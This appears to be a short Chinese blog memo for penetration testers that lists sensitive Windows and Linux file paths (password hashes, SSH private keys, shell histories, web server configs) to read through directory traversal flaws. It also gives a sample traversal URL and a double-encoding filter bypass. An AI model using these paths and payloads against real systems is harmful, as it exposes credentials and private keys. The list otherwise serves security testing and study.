时间戳

首页 > 技术文章 > 目录遍历漏洞常用配置文件目录--备忘

目录遍历漏洞常用配置文件目录--备忘

Qiuzhiyu 2020-04-07 20:00 原文

Windows:
   C:\boot.ini  #查看系统版本
   C:\Windows\System32\inetsrv\MetaBase.xml  #IIS配置文件
   C:\Windows\repair\sam  #存储系统初次安装的密码
   C:\Program Files\mysql\my.ini  #Mysql配置
   C:\Program Files\mysql\data\mysql\user.MYD  #Mysql root
   C:\Windows\php.ini  #php配置信息
   C:\Windows\my.ini  #Mysql配置信息
   ...
Linux:
   /etc/passwd                  #查看用户文件
   /etc/shadow                  #查看密码文件,如果能读取该文件说明是root权限
   /etc/my.cnf 
   /etc/httpd/conf/httpd.conf   #查看apache的配置文件
   /root/.bash_history          #查看历史命令
   /root/.mysql_history         #mysql历史命令记录文件
   /var/lib/mlocate/mlocate.db  #本地所有文件信息
   /etc/ssh/sshd_config         #ssh配置文件,如果对外开放可看到端口
   /proc/self/fd/fd[0-9]*(文件标识符)
   /proc/mounts
   /porc/config.gz
   /root/.ssh/authorized_keys                
   /root/.ssh/id_rsa  
   /root/.ssh/id_ras.keystore
   /root/.ssh/known_hosts
 
程序的配置文件
apache:
    /etc/httpd/conf/httpd.conf
    /etc/apache2/httpd.conf
    /etc/apache2/apache2.conf
    /WEB-INF/web.xml
 
nginx:
    /etc/nginx/nginx.conf
    /usr/local/nginx/conf/nginx.conf
    /usr/local/etc/nginx/nginx.conf
 
redis:
    /etc/redis.conf
 
 
使用示例:index.php?f=../../../../../../etc/passwd

绕过../:构造 /.%252e/.%252e/.%252e/ , %25对应的是%,%2e对应的是 .

 

推荐阅读